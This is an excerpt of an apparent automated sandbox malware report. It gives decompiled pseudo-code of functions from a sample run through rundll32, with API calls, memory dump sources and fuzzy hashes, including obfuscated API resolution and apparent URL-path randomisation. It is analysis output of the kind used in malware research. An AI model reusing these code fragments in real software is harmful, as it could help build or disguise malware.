				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04B947E2(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04B940CE(_t23);
						}
					}
					return _t38;
				}
				if(E04B91000(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4b9a34c, 1, 0,  *0x4b9a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04B92517(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04B94467(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04B95D72(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04B92634( &_v32, _t39);
					goto L13;
				}
			}












                0x04b916cd
                0x04b916da
                0x04b916e0
                0x04b916e1
                0x04b916e2
                0x04b916e3
                0x04b916e4
                0x04b916e8
                0x04b916f4
                0x04b916f8
                0x04b91780
                0x04b91780
                0x04b91783
                0x04b91785
                0x04b9178d
                0x04b91793
                0x04b91796
                0x04b91796
                0x04b91793
                0x04b917a1
                0x04b917a1
                0x04b9170b
                0x04b9170d
                0x04b9170d
                0x04b91724
                0x04b91728
                0x04b9172b
                0x04b91736
                0x04b9173d
                0x04b9173d
                0x04b91746
                0x04b9174a
                0x04b91758
                0x04b9174c
                0x04b9174c
                0x04b9174d
                0x04b9174e
                0x04b9174f
                0x04b91750
                0x04b91751
                0x04b91751
                0x04b9175d
                0x04b91760
                0x04b91764
                0x04b91766
                0x04b91766
                0x04b9176d
                0x00000000
                0x04b9176f
                0x04b9176f
                0x04b9177c
                0x00000000
                0x04b9177c

                APIs
                • CreateEventA.KERNEL32(04B9A34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 04B9171E
                • SetEvent.KERNEL32(00000000), ref: 04B9172B
                • Sleep.KERNEL32(00000BB8), ref: 04B91736
                • CloseHandle.KERNEL32(00000000), ref: 04B9173D
                  • Part of subcall function 04B92517: WaitForSingleObject.KERNEL32(00000000,?,?,?,04B9175D,?,04B9175D,?,?,?,?,?,04B9175D,?), ref: 04B925F1
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                • String ID:
                • API String ID: 2559942907-0
                • Opcode ID: 64c2737e138d2a0b7aa2bc08b0bb5e21114b02f35decd281d9eaaffeb5fca655
                • Instruction ID: 4e8b4f91c012a8094261fbecac25bbc1273117e0dc9efaec0a114e904dfa7eb4
                • Opcode Fuzzy Hash: 64c2737e138d2a0b7aa2bc08b0bb5e21114b02f35decd281d9eaaffeb5fca655
                • Instruction Fuzzy Hash: 7C2144B6900117ABEF11AFF88484CEE77E9EB44254B0544B5EA11A7100DB38BD4597A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94942 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E04B94942(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04B96601(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                0x04b9494e
                0x04b94952
                0x04b94953
                0x04b94954
                0x04b94956
                0x04b94958
                0x04b9495b
                0x04b94960
                0x04b949f7
                0x04b949fe
                0x04b949fe
                0x04b94969
                0x04b94970
                0x04b94980
                0x04b94980
                0x04b94986
                0x04b94988
                0x04b9498d
                0x04b94996
                0x04b9499c
                0x04b949a1
                0x04b949ac
                0x04b949b0
                0x04b949b2
                0x04b949b3
                0x04b949bc
                0x04b949c0
                0x04b949d1
                0x04b949c2
                0x04b949c7
                0x04b949cc
                0x04b949db
                0x04b949db
                0x04b949b0
                0x04b949e1
                0x04b949e7
                0x04b949e7
                0x04b949f0
                0x04b949f5
                0x04b949f5
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: 06e0fc4d5579fe51d1712acb5c1941147e9e6c0b47f2b939fa214e0c26e4892c
                • Instruction ID: bb573660fd9630a18303f751c37bf968c7456cea8d2438acf25032253f05e119
                • Opcode Fuzzy Hash: 06e0fc4d5579fe51d1712acb5c1941147e9e6c0b47f2b939fa214e0c26e4892c
                • Instruction Fuzzy Hash: 8221FA79905209EFDF11DFA8D98499EBBF8EF59304B1041B9E946A7210EB31EE41CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92273 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E04B92273(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4b9a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4b9a2f0; // 0xd0d2e878
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4b9a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                0x04b9227b
                0x04b9227e
                0x04b92284
                0x04b9229c
                0x04b9229e
                0x04b922a3
                0x04b922a5
                0x04b922a8
                0x04b922aa
                0x04b922ad
                0x04b922af
                0x04b922af
                0x04b922b1
                0x04b922bc
                0x04b922c1
                0x04b922d2
                0x04b922da
                0x04b922df
                0x04b922e2
                0x04b922e5
                0x04b922e7
                0x04b922ea
                0x04b922ed
                0x04b922ed
                0x04b922f0
                0x04b922fb
                0x04b92300
                0x04b9230a

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B95E1D,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B9227E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B92296
                • memcpy.NTDLL(00000000,05109600,-00000008,?,?,?,04B95E1D,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B922DA
                • memcpy.NTDLL(00000001,05109600,00000001,04B96DDD,00000000,05109600), ref: 04B922FB
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: f247ad16eccedfcc614d93699aa2b8efdc49fc7a7fa26ec394a7f07745ccd294
                • Instruction ID: ee354da526b7bb781351d89164967e1e0dd807d4fba13e253a39ecec5bc7336d
                • Opcode Fuzzy Hash: f247ad16eccedfcc614d93699aa2b8efdc49fc7a7fa26ec394a7f07745ccd294
                • Instruction Fuzzy Hash: CE1129B2A00214BFDF148F69DD84D9E7BEEDB85360B1501BAF404D7240EB759E0487B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B958B9 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E04B958B9(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E04B951D3(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x4b9a348; // 0x56d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x4b9b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x4b9b904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E04B92496();
					_push( &_v64);
					if( *0x4b9a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E04B92496();
				}
				return _t28;
			}














                0x04b958b9
                0x04b958c0
                0x04b958ce
                0x04b958d2
                0x04b958dc
                0x04b958e1
                0x04b958e6
                0x04b958eb
                0x04b958f5
                0x04b958ff
                0x04b958ff
                0x04b958f7
                0x04b958f7
                0x04b958f7
                0x04b958f7
                0x04b95905
                0x04b9590b
                0x04b9590c
                0x04b9590f
                0x04b95912
                0x04b95915
                0x04b9591d
                0x04b95926
                0x04b9592e
                0x04b9592e
                0x04b95930
                0x04b95932
                0x04b95932
                0x04b9593c

                APIs
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(00000000), ref: 04B9522D
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(0070006F), ref: 04B95241
                  • Part of subcall function 04B951D3: SysAllocString.OLEAUT32(00000000), ref: 04B95253
                • memset.NTDLL ref: 04B958DC
                • GetLastError.KERNEL32 ref: 04B95928
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocString$ErrorLastmemset
                • String ID: <$@MetNet
                • API String ID: 3736384471-3263418992
                • Opcode ID: 7a92fcd133bdea4220a20265d0bb2df48b781d553f34514d363df7f0f5381a0c
                • Instruction ID: 62219536732402e868f33db6424f965a20108591f74c03456cb6c5564d860fd9
                • Opcode Fuzzy Hash: 7a92fcd133bdea4220a20265d0bb2df48b781d553f34514d363df7f0f5381a0c
                • Instruction Fuzzy Hash: 6E012171D00218BBDF11DFA8D885EDE7BF8FB09794F414566E904E7201E774AD048BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B967A3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B967A3(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                0x04b967ad
                0x04b967b1
                0x04b967c6
                0x04b967c8
                0x04b967cd
                0x04b967d3
                0x04b967d5
                0x04b967da
                0x04b967e5
                0x04b967dc
                0x04b967dc
                0x04b967dc
                0x04b967da
                0x04b967f3

                APIs
                • memset.NTDLL ref: 04B967B1
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 04B967C6
                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B967D3
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04B96E43,00000000,?), ref: 04B967E5
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CreateEvent$CloseHandlememset
                • String ID:
                • API String ID: 2812548120-0
                • Opcode ID: a0ea52cb123bcdd32f255066ac688e033b0fc15dbc2899fdf6d7a996ef7c4ccf
                • Instruction ID: 45bb6216490cae5752b87c4fe967bf49ab4b4417b4c12e60d1e7083b396380af
                • Opcode Fuzzy Hash: a0ea52cb123bcdd32f255066ac688e033b0fc15dbc2899fdf6d7a996ef7c4ccf
                • Instruction Fuzzy Hash: 50F05EF1104308BFE7106F26DCC4C2BBFECEB41298B11497EF55682111DA75EC088A71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9395F Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B9395F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4b9a30c; // 0x2c0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4b9a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4b9a30c; // 0x2c0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4b9a2d8; // 0x4d10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                0x04b9395f
                0x04b93966
                0x04b939b0
                0x04b939b2
                0x04b939b2
                0x04b9396a
                0x04b93970
                0x04b93975
                0x04b93979
                0x04b9397f
                0x04b93986
                0x00000000
                0x00000000
                0x04b93988
                0x04b9398d
                0x00000000
                0x00000000
                0x00000000
                0x04b9398d
                0x04b9398f
                0x04b93997
                0x04b9399a
                0x04b9399a
                0x04b939a0
                0x04b939a7
                0x04b939aa
                0x04b939aa
                0x00000000

                APIs
                • SetEvent.KERNEL32(000002C0,00000001,04B92F45), ref: 04B9396A
                • SleepEx.KERNEL32(00000064,00000001), ref: 04B93979
                • CloseHandle.KERNEL32(000002C0), ref: 04B9399A
                • HeapDestroy.KERNEL32(04D10000), ref: 04B939AA
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: 2c711623efab240ea51fea0023305e7122542f5f72562c84e208bea2ba0e7319
                • Instruction ID: 39c0df0ab4f4b0414a547ef4c1042f41c4bd000ab00e8084c9535067b09126ac
                • Opcode Fuzzy Hash: 2c711623efab240ea51fea0023305e7122542f5f72562c84e208bea2ba0e7319
                • Instruction Fuzzy Hash: 3AF039B1B00311ABEF205B36AA48B5637E8EB1D761B04126ABC16E7780DF28EC448670
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401DA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401DA8(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x4041b0;
				_t19 = 0x104;
				_t23 = E00401634(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E00401B8C(_t23);
					_t23 = E00401634(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E00401B8C(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                0x00401db9
                0x00401dbc
                0x00401dc6
                0x00401dca
                0x00401e1f
                0x00401e21
                0x00401e22
                0x00401e27
                0x00000000
                0x00000000
                0x00000000
                0x00401dcc
                0x00401dcc
                0x00401dd1
                0x00401dd7
                0x00401ddc
                0x00000000
                0x00000000
                0x00401de3
                0x00401de9
                0x00401df7
                0x00401dfb
                0x00000000
                0x00000000
                0x00000000
                0x00401dfb
                0x00401dfd
                0x00401e01
                0x00000000
                0x00000000
                0x00401e06
                0x00401e16
                0x00401e18
                0x00401e08
                0x00401e0b
                0x00401e0b
                0x00000000

                APIs
                  • Part of subcall function 00401634: RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,00401D04,?), ref: 00401DD1
                • GetLastError.KERNEL32(?,?,?,00401D04,?), ref: 00401E0F
                  • Part of subcall function 00401B8C: RtlFreeHeap.NTDLL(00000000,00000030,004017C9,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401C96), ref: 00401B98
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFileFreeLastModuleName
                • String ID: @Met`fet MetTet
                • API String ID: 845456116-3757152079
                • Opcode ID: 039b0453bcb4b0e713a46865719909fde321064ec83d6e3893f24cb5eb5932f0
                • Instruction ID: 7fc625f481d614ce65e22506c8c43573341987d19a128e4d600b3ab6aedbb8a0
                • Opcode Fuzzy Hash: 039b0453bcb4b0e713a46865719909fde321064ec83d6e3893f24cb5eb5932f0
                • Instruction Fuzzy Hash: D701D872901616A7C7219769CC4499FBAAD9FC5750B150137FD00B72A0EA78DD4187F8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B955C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E04B955C3(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x4b9a340;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x4b9a2f4; // 0x2c4
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x4b9a348; // 0x56d5a8
				_t3 = _t12 + 0x4b9b0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x4b9a348; // 0x56d5a8
				_t4 = _t17 + 0x4b9b9e0; // 0x6f577349
				 *0x4b9a314 = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x4b9a340 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}










                0x04b955c7
                0x04b955cc
                0x04b955d1
                0x04b955d9
                0x04b9560f
                0x04b95611
                0x04b95618
                0x04b9561c
                0x04b9561e
                0x04b9561e
                0x04b9561c
                0x04b95621
                0x04b95626
                0x04b95626
                0x04b955db
                0x04b955e0
                0x04b955e7
                0x04b955ed
                0x04b955f3
                0x04b955fb
                0x04b95600
                0x04b95606
                0x04b9560d
                0x00000000
                0x00000000
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(4E52454B,00000001,?,?,04B9692A,?,?), ref: 04B955E7
                • GetProcAddress.KERNEL32(00000000,6F577349), ref: 04B95600
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: Net
                • API String ID: 1646373207-515476347
                • Opcode ID: de7d62002d00752edaa90be934dc0510b4a48655a9e8e88e0319456a2b65195d
                • Instruction ID: 333baac3b5e18a535f8a0433bfe204ae9229a5a8bc845f1e6894d2db7fd68531
                • Opcode Fuzzy Hash: de7d62002d00752edaa90be934dc0510b4a48655a9e8e88e0319456a2b65195d
                • Instruction Fuzzy Hash: BFF0F47151520ABFCF15CFA5DA55A6577FCFB09745B10015AE401D3200EB78FE04CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B95448 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E04B95448(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04B96601(_t2);
				if(_t34 != 0) {
					_t30 = E04B96601(_t28);
					if(_t30 == 0) {
						E04B94130(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04B97B8E(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04B97B8E(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                0x04b95448
                0x04b95452
                0x04b95454
                0x04b9545a
                0x04b9545a
                0x04b95463
                0x04b95467
                0x04b95473
                0x04b95477
                0x04b954eb
                0x04b95479
                0x04b95479
                0x04b9547d
                0x04b95482
                0x04b95487
                0x04b954a1
                0x04b95490
                0x04b95490
                0x04b95494
                0x04b95497
                0x04b9549c
                0x04b9549c
                0x04b954a6
                0x04b954ce
                0x04b954d4
                0x04b954d7
                0x04b954a8
                0x04b954aa
                0x04b954b2
                0x04b954bd
                0x04b954c2
                0x04b954c2
                0x04b954de
                0x04b954e5
                0x04b954e6
                0x04b954e6
                0x04b95477
                0x04b954f6

                APIs
                • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0), ref: 04B95454
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                  • Part of subcall function 04B97B8E: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04B95482,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102), ref: 04B97B9C
                  • Part of subcall function 04B97B8E: StrChrA.SHLWAPI(?,0000003F,?,?,04B96416,?,?,?,?,00000102,04B946E0,?,?,746981D0,00000000), ref: 04B97BA6
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04B96416,?,?,?,?,00000102,04B946E0,?), ref: 04B954B2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04B954C2
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04B954CE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
